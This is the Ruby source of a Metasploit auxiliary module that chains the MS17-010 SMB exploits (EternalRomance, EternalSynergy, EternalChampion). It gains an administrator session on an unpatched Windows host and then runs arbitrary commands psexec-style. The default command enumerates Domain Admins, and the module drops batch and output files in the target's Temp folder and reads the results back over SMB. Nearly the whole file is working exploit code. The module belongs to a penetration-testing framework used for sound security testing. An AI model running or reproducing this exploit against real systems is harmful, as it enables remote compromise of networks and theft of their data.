211 lines
7.5 KiB
Ruby
211 lines
7.5 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',
|
|
'Description' => %q{
|
|
This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
|
|
primitive. This will then be used to overwrite the connection session information with as an
|
|
Administrator session. From there, the normal psexec command execution is done.
|
|
|
|
Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
|
|
Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
|
|
exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
|
|
named pipe.
|
|
},
|
|
|
|
'Author' => [
|
|
'sleepya', # zzz_exploit idea and offsets
|
|
'zerosum0x0',
|
|
'Shadow Brokers',
|
|
'Equation Group'
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
'References' => [
|
|
[ 'AKA', 'ETERNALSYNERGY' ],
|
|
[ 'AKA', 'ETERNALROMANCE' ],
|
|
[ 'AKA', 'ETERNALCHAMPION' ],
|
|
[ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred
|
|
[ 'MSB', 'MS17-010' ],
|
|
[ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests
|
|
[ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests
|
|
[ 'CVE', '2017-0147'], # for EternalRomance reference
|
|
[ 'URL', 'https://github.com/worawit/MS17-010' ],
|
|
[ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
|
|
[ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
|
|
],
|
|
'DisclosureDate' => 'Mar 14 2017'
|
|
))
|
|
|
|
register_options([
|
|
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
|
|
OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group "Domain Admins" /domain']),
|
|
OptString.new('RPORT', [true, 'The Target port', 445]),
|
|
OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),
|
|
])
|
|
|
|
register_advanced_options([
|
|
OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),
|
|
OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),
|
|
OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),
|
|
])
|
|
|
|
deregister_options('RHOST')
|
|
end
|
|
|
|
def run_host(ip)
|
|
|
|
begin
|
|
eternal_pwn(ip) # exploit Admin session
|
|
smb_pwn(ip) # psexec
|
|
|
|
rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e
|
|
print_error("#{e.message}")
|
|
rescue ::Errno::ECONNRESET,
|
|
::Rex::HostUnreachable,
|
|
::Rex::Proto::SMB::Exceptions::LoginError,
|
|
::Rex::ConnectionTimeout,
|
|
::Rex::ConnectionRefused => e
|
|
print_error("#{e.class}: #{e.message}")
|
|
rescue => error
|
|
print_error(error.class.to_s)
|
|
print_error(error.message)
|
|
print_error(error.backtrace.join("\n"))
|
|
ensure
|
|
eternal_cleanup() # restore session
|
|
end
|
|
end
|
|
|
|
def smb_pwn(ip)
|
|
text = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt"
|
|
bat = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat"
|
|
@smbshare = datastore['SMBSHARE']
|
|
@ip = ip
|
|
|
|
# Try and authenticate with given credentials
|
|
res = execute_command(text, bat)
|
|
|
|
if res
|
|
for i in 0..(datastore['RETRY'])
|
|
Rex.sleep(datastore['DELAY'])
|
|
# if the output file is still locked then the program is still likely running
|
|
if (exclusive_access(text))
|
|
break
|
|
elsif (i == datastore['RETRY'])
|
|
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
|
|
end
|
|
end
|
|
get_output(text)
|
|
end
|
|
|
|
cleanup_after(text, bat)
|
|
end
|
|
|
|
#
|
|
# TODO: the rest shamelessly copypasta from auxiliary/admin/smb/psexec_command
|
|
# it should probably be mixin'd. I have changed some of vprint/print tho
|
|
# => zerosum0x0
|
|
#
|
|
|
|
# Executes specified Windows Command
|
|
def execute_command(text, bat)
|
|
# Try and execute the provided command
|
|
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
|
|
vprint_status("Executing the command...")
|
|
begin
|
|
return psexec(execute)
|
|
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
|
|
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
|
print_error("Unable to execute specified command: #{e}")
|
|
return false
|
|
end
|
|
end
|
|
|
|
# Retrive output from command
|
|
def get_output(file)
|
|
vprint_status("Getting the command output...")
|
|
output = smb_read_file(@smbshare, @ip, file)
|
|
if output.nil?
|
|
print_error("Error getting command output. #{$!.class}. #{$!}.")
|
|
return
|
|
end
|
|
if output.empty?
|
|
print_status("Command finished with no output")
|
|
return
|
|
end
|
|
|
|
# Report output
|
|
vprint_good("Command completed successfuly!")
|
|
|
|
# zerosum0x0: this is better with Verbose off in this case
|
|
print_status("Output for \"#{datastore['COMMAND']}\":")
|
|
print_line("#{output}")
|
|
|
|
report_note(
|
|
:rhost => datastore['RHOSTS'],
|
|
:rport => datastore['RPORT'],
|
|
:type => "psexec_command",
|
|
:name => datastore['COMMAND'],
|
|
:data => output
|
|
)
|
|
|
|
end
|
|
|
|
# check if our process is done using these files
|
|
def exclusive_access(*files)
|
|
begin
|
|
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
|
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
|
print_error("Unable to get handle: #{accesserror}")
|
|
return false
|
|
end
|
|
files.each do |file|
|
|
begin
|
|
vprint_status("checking if the file is unlocked")
|
|
fd = smb_open(file, 'rwo')
|
|
fd.close
|
|
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
|
print_error("Unable to get handle: #{accesserror}")
|
|
return false
|
|
end
|
|
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
|
end
|
|
return true
|
|
end
|
|
|
|
|
|
# Removes files created during execution.
|
|
def cleanup_after(*files)
|
|
begin
|
|
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
|
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
|
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
|
|
return
|
|
end
|
|
vprint_status("Executing cleanup...")
|
|
files.each do |file|
|
|
begin
|
|
smb_file_rm(file)
|
|
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
|
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
|
|
end
|
|
end
|
|
left = files.collect{ |f| smb_file_exist?(f) }
|
|
if left.any?
|
|
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
|
else
|
|
print_good("Cleanup was successful")
|
|
end
|
|
end
|
|
|
|
end
|